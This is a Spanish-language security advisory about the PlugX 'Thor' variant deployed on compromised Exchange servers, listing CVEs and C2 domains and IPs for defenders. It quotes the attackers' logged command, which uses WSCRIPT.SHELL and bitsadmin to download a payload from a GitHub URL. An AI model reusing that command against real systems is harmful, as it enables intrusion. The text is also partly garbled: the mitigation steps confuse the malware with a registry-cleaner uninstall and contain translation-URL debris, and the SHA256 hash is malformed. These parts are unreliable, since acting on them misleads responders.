1. Alertas de Seguridad
  2. Hackers chinos implantan variante del malware PlugX en Servidores MS Exchange comprometidos

Hackers chinos implantan variante del malware PlugX en Servidores MS Exchange comprometidos

Fecha de publicación: Mié, 28/07/2021 - 14:11

Descripción

El equipo de inteligencia de amenazas de la Unidad 42 de Palo Alto Networks, identificó una nueva versión del malware modular PlugX, llamado Thor, que se entregó como una herramienta posterior a la explotación, a uno de los servidores vulnerados.

Productos afectados

  • Microsoft Exchange Server 2019
  • Microsoft Exchange Server 2016
  • Microsoft Exchange Server 2013

Mitigación

aro.exe no es esencial para Windows y ocasionará problemas frecuentemente (debido a que algunos malware se camuflan como aro.exe). El archivo aro.exe se encuentra en una subcarpeta de “C:\Archivos de programa (x86)” (normalmente C:\Archivos de programa(x86)\ARO 2012\).

Si aro.exe se encuentra en la carpeta C:\Windows o C:\Windows\System32, debe verificar el proceso aro.exe en su PC para ver si es una amenaza y eliminarla, se recomienda utilizar Security Task Manager para verificar la seguridad de su computadora.

Para desinstalar aro.exe debe realizar los siguientes pasos:

  1. Presionar la tecla de Windows + X para abrir el menú de inicio.
  2. Haga clic en el primer elemento del menú Programas y características.
  3. En la lista de programas instalados, busque ARO + 2012 o ARO + 2011 & _x_tr_sl = auto & _x_tr_tl = es & _x_tr_hl = es-419 & _x_ .
  4. Haga clic en el software que desea desinstalar.
  5. Haga clic en el boton Desisntalar que aparece en la parte superior de la lista de programas y siga las instrucciones para desintalar el programa.

La unidad 42 de Palo Alto Networks creó un script Python que puede descifrar y descomprimir cargas útiles PlugX cifradas sin tener los cargadores PlugX asociados. Intenta detectar el tipo de muestras cifradas con PlugX y luego genera lo siguiente:

  1. Módulo PlugX (DLL) descifrado y descomprimido. Agrega un encabezado MZ al archivo ya que el encabezado MZ no está presente en el módulo en memoria. Solo se aplica a las cargas útiles cifradas que tienen el encabezado de byte aleatorio (cargas útiles THOR).
  2. Archivo de configuración PlugX codificado (información C2,), si es compatible.

Puede ver aquí un ejemplo de la herramienta en acción.

La herrameinta de descifrado está alojada en el repositorio de GitHub.

Indicadores de compromiso

Los atacantes utilizaron una técnica conocida como “living off the land” que utiliza binarios confiables para evitar la detección de antivirus. En este caso, se utilizó el binario bitsadmin.exe de Microsoft Windows para descargar un archivo inocuo llamado Aro.dat (SHA256: 59BA902871E98934C054649CA582E2A01707998ACC78B2570FEF43DD10F7B6F) desde un repositorio de GitHub.

El comando que ejecuta el binario bitsadmin.exe es:

,/log/shell-event-101,36,120[,]127,log:1[2021-03-119T01:59:09Z] - : POST -/asnet_cliente/shell.aspx - - curl/7,61,1

,/logs/shell-event-101,36,120[,]227,log-2-body:orange=new \ AdctiveXObject(“WSCRIPT.SHELL”).Run(“cmd.exe /c bitsadmin/transfer \ n https://raw.githubusercontent.com/tellyou123/1/master/aro.dat \ C:\\windows\\temp\\aro.dat > C:\\inetpub\\wwwroot\\aspnet_client\\1.txt”);

aro.dat está diseñado para pasar desapercibido (es una herramienta de libre acceso que pretende corregir errores de registro de Windows) y no puede ejecutarse sin la ayuda de un cargador específico. Al igual que con las variantes anteriores de PlugX, la ejecución del código se logra mediante una técnica conocida como “carga lateral de DLL”. El análisis estático revela que una vez cargado en la memoria, Aro.dat comienza a descomprimirse e inicia la comunicación con un servidor C2 (que hace referencia al nombre de dominio rainydaysweb.com).

aro.dat es una carga útil de PlugX encriptada y comprimida. La rutina de descifrado dentro de Aro.dat se parece mucho a la de las variantes de PlugX más antiguas que implican varias claves de descifrado y operaciones de cambio de bits. Una vez descifrado, se descomprime a través de la API de Windows RtlDecompressBuffer en un módulo de Windows (DLL). El algoritmo de compresión es la compresión LZ (COMPRESSION_FORMAT_LZNT1).

Una vez que la carga útil descifrada se ejecuta en la memoria, presenta los mismos comportamientos que las variantes PlugX anteriores. Comienza descifrando loas ajustes de configuración codificados de PlugX incrustados. El algoritmo de descifrado y las claves XOR son bastante consistentes en varios implantes PlugX. El comportamiento del código se parece mucho al de RedDelta PlugX que ha informado Insikt Group. Una diferencia notable se encuentra en la comparación del número mágico realizada durante la inicialización de los complementos Plugx. Ese numero siempre ha sido 0x504C5547, que corresponde al valor PLUG en la codificación ASCII, en la muestra obtenida el nuevo número mágico es 0x55484f52, correspondiente al valor THOR en codificación ASCII.

PlugX (bytes mágicos de THOR) relacionado con la vulnerabilidad de Microsoft Exchange

  • rainydaysweb.com
  • 154.211.14.156

Otros PlugX (bytes mágicos de THOR)

  • upload.ukbbcnews.com
  • indonesianaport.info
  • tools.scbbgroup.com
  • www.cabsecnow.com
  • news.cqpeizi.com
  • 45.248.87.217
  • 103.85.24.158
  • 167.88.180.131
  • 167.88.180.32
  • 108.61.182.34

Puede ver más indicadores de compromiso aquí.

Recomendación

Los equipos desactualizados siguen siendo vulnerables, por lo tanto debe instalar la actualización más reciente de MS Exchange. Si el servidor MS Exchange tiene acceso a Internet y no se ha actualizado ni se ha protegido con un software de terceros, entonces debería considerar que el servidor esta en peligro.

Identificador CVE

Los indicadores CVE asociadas a PlugX son:

CVE-2021-26855, esta vulnerabilidad falsifica solicitudes del lado del servidor (SSRF) en MS Exchange que permite al ciberdelincuente enviar solicitudes HTTP arbitrarias y autenticarse como el servidor de Exchange.

CVE-2021-26857, es una vulnerabilidad de deserialización insegura en el servicio de Mensajería Unificada. Este error se produce cuando los datos no confiables controlados por el usuario son deserializados por un programa. La explotación de esta vulnerabilidad da la capacidad de ejecutar código como sistema en el servidor Exchange, lo que requiere el permiso del administrador u otra vulnerabilidad.

CVE-2021-26858, es una vulnerabilidad de escritura arbitraria de archivos después de la autentificación en Exchange. Si el atacante pudiera autenticarse en el servidor, podría utilizar esta vulnerabilidad para escribir un archivo en cualquier ruta del servidor. Podría autenticarse explotando la vulnerabilidad CVE-2021-26855 SSRF o comprometiendo las credenciales de un administrador legítimo.

CVE-2021-27065 es una vulnerabilidad de escritura arbitraria de archivos posterior a la autenticación en Exchange. Si un atacante logra autenticarse, podría escribir un archivo en cualquier ruta del servidor. También podrían autenticarse explotando la vulnerabilidad CVE-2021-26855 SSRF o usando las credenciales del administrador.

Referencias

https://thehackernews.com/2021/07/chinese-hackers-implant-plugx-variant.html

https://www.notimerica.com/ciencia-tecnologia/noticia-portaltic-ciberataques-servidores-microsoft-exchange-vulnerables-duplican-cada-dos-tres-horas-20210312170851.html

https://www.file.net/process/aro.exe.html